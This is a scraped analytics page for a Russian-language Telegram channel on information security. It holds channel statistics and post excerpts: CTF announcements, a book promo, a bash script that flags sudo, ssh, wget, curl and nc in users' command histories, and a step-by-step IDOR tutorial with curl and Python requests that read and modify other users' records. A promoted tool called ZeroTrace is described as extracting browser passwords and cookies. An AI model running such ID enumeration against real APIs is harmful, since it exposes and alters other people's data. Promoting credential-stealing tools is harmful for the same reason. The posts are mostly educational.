CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition
Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 12 645 subscribers, ranking 10 024 in the Technologies & Applications category and 52 149 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 645 subscribers.
According to the latest data from 24 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 477 over the last 30 days and by 5 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 12.73%. Within the first 24 hours after publication, content typically collects 7.08% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 610 views. Within the first day, a publication typically gains 895 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 4.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 25 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
🏅Победители: @lapsusS1 @vigotron @d3769 Благодарность @Anoninua — очень помогал в проведенииКаждому вручён заслуженный денежный приз или книга. 🔺 Мы поняли, что задания получились сложными, в следующий раз будем делать их максимально доступными для всех. Не судите строго, это наш первый CTF. 🔔 Разбор задания и будущие CTF я буду проводить на своём ламповом канале @N3tHunterLab — подписывайтесь, чтобы ничего не пропустить! Ставьте реакцию 👍 — если надо повторить ❤️ — если было прикольно Спасибо всем за участие, следите за новостями — впереди ещё много интересного! 😈 CodeGuard | #CTF_CodeGuard
📔 Книга: «OSINT. Руководство по сбору и анализу открытой информации в интернете» Автор: Дейл Мередит Год: 2025Хотите научиться проводить цифровые расследования и превращать уйму открытых данных в ценные инсайты? Эта книга станет вашим надёжным путеводителем в мире OSINT — сбора и анализа информации из публичных источников. 👩💻 Что внутри: - Пошаговое знакомство с основами кибербезопасности и разведки по открытому интернету - Советы по сохранению анонимности и избеганию цифровых ловушек - Обзор и практическое использование популярных инструментов: Recon-ng, Maltego, Shodan, Aircrack-ng и др. - Как находить, собирать и анализировать скрытые данные в публичных источниках - Превентивные меры для защиты личных и корпоративных данных - Этичные и профессиональные методы работы с OSINT - Реальные сценарии и примеры расследований для отработки навыков 💠 Рекомендуется всем, кто хочет стать цифровым детективом)), специалистом по кибербезопасности или повысить уровень защиты данных. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #OSINT #security
🚀Основные возможности: - Извлечение паролей и куки из браузеров Chrome и других популярных - Мониторинг клиентов в реальном времени с анализом сетевых соединений - Безопасная передача данных с использованием шифрования - Поддержка различных операционных систем и браузеров📱 Подробности на GitHub ZeroTrace подходит для специалистов по кибербезопасности, которые хотят эффективнее отслеживать утечки и повышать защищённость пользователей. 😈 CodeGuard | #ZeroTrace #monitoring #opensource
Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}Ты помнишь, отправляя ответ на уровень EASY, ты не сможешь победить в других категориях(но сможешь поучаствовать) ⏳ Остальные уровни (MEDIUM и HARD) откроются сегодня в течении дня(всевышние силы помогите нам) — тогда же мы поделимся дополнительной информацией тут. 🚫 Важное: инструкцию доступна здесь 🏆 Призы ждут самых быстрых и ловких! Вопросы — в чат CodeGuard. Удачи, пентестеры! Вперед к победе! 😈 CodeGuard | #CTF_CodeGuard
Почему это важно? - Отслеживайте использование `sudo`, запуск удалённых подключений через `ssh` - Контролируйте загрузку файлов с помощью `wget`, `curl` - Находите нестандартные сетевые активности через `nc` или похожие команды⭐️ Как добавить время к истории команд? В файле
~/.bashrc добавьте:
export HISTTIMEFORMAT="%F %T "
Это позволит видеть точное время выполнения команд.
⭐️ Только пример простого скрипта для поиска подозрительных команд у всех пользователей:
#!/bin/bash
LOGFILE="/var/log/user_command_analysis.log"
PATTERNS="sudo|ssh|wget|curl|nc"
> $LOGFILE
for user_dir in /home/*; do
user=$(basename "$user_dir")
hist_file="$user_dir/.bash_history"
if [ -f "$hist_file" ]; then
echo "Анализ истории пользователя $user" >> "$LOGFILE"
grep -E "$PATTERNS" "$hist_file" >> "$LOGFILE"
echo "-------------------------" >> "$LOGFILE"
fi
done
echo "Анализ истории команд завершён. Результаты в $LOGFILE"
⭐️ Что дальше?
- Настроить скрипт на регулярный запуск в cron для мониторинга
- Добавить отправку отчёта на email
- Расширять список ключевых паттернов для поиска нужных событий
Такой подход даст быстрый и понятный контроль за действиями пользователей и повысит безопасность ваших систем.
Как тебе видос к посту?ставь реакцию)
❤️ - да пойдет, прикольное
👍 - да какая-то детская кринжатина, мы хакеры нам надо черный и нагнетающий видос!
😈 CodeGuard | #bash #sysadmin #bashscript #history #security🔥 Внимание! 📅 Даты проведения: 20.09 с 11:00 до 21.09 20:00 (МСК) Ребята, завтра в 11.00 стартует CTF от CodeGuard, ура!💀 Концепция соревнования Наш CTF - классический формат Jeopardy, разделенный на три уровня сложности: Легкий, Средний и Сложный. В каждой категории предстоит найти 3 флага: User, Admin и Root. Задачи охватывают направления: Веб, Криптография, Стеганография, Реверс-инжиниринг, Форензика и др. ➡️ Структура соревнования - Однопоточный формат — все категории доступны сразу. - Легкий уровень — задачи на базовые навыки. - Средний — требует более глубоких знаний. - Сложный — экспертиза в эксплойтинге и анализе.
Инструкция тут! Ознакомитесь заранее. p.s что бы не тратить время завтра в 11:00, а сразу начать выполнение и победить.🏆 Правила получения призов - Призы — книги, отдельно в каждой категории. (указал в инструкции, что конкретно) - Когда получите/найдете все три флага в одной из категории, отправьте в [CodeGuard@bk.ru] письмо.
Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}👀 Запрещено — подавать заявки в несколько категорий одновременно — DDos — ограничен перебор по количеству потоков 🎮 Посмотри инструкцию! Участвуйте, проверяйте свои навыки и побеждайте! Завтра в 11:00 пост и начало! Удачи всем! 😈 CodeGuard | #CTF_CodeGuard
Это позволяет: 1. Получать полный список снимков. Все даты и версии страниц, CSS, JS, изображений. 2. Фильтровать по времени. Изучать сайт в конкретный год, месяц или даже день. 3. Анализировать изменения. Сравнивать содержимое, заголовки, метатеги, скрипты между разными эпохами.✨ Читать дальше 😈 CodeGuard | #osint
PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.Спасибо, что вы здесь — вместе мы сильнее!
https://api.example.com/users/123где
123 — это ID пользователя.
Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:
curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"
Если нет токена, попробуй запросить без него — иногда API плохо проверяет права.
➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные?
Попробуй подставить другой ID пользователя:
curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"
Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference).
➡️Шаг 3. Что можно сделать, если уязвимость есть?
Можно читать чужие данные, а иногда — менять их. Например, изменить email:
curl -X PUT https://api.example.com/users/124 \
-H "Authorization: Bearer твой_токен" \
-H "Content-Type: application/json" \
-d '{"email":"hacker@example.com"}'
Если это сработало — значит API не проверяет права правильно, и это опасно.
➡️Шаг 4. Немного автоматизации с Python
Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:
import requests
url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}
for user_id in range(120, 130):
r = requests.get(url + str(user_id), headers=headers)
if r.status_code == 200:
print(f"Данные пользователя {user_id} доступны!")
Главное: Проверяй только то, что разрешено, иначе это незаконно.
😈 CodeGuard | #API #pentest #curl #python #vulnerabilityДобро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.➡️ Продолжение тут 😈 CodeGuard | #cybersecurity
📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальшеИзучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf
Available now! Telegram Research 2025 — the year's key insights 
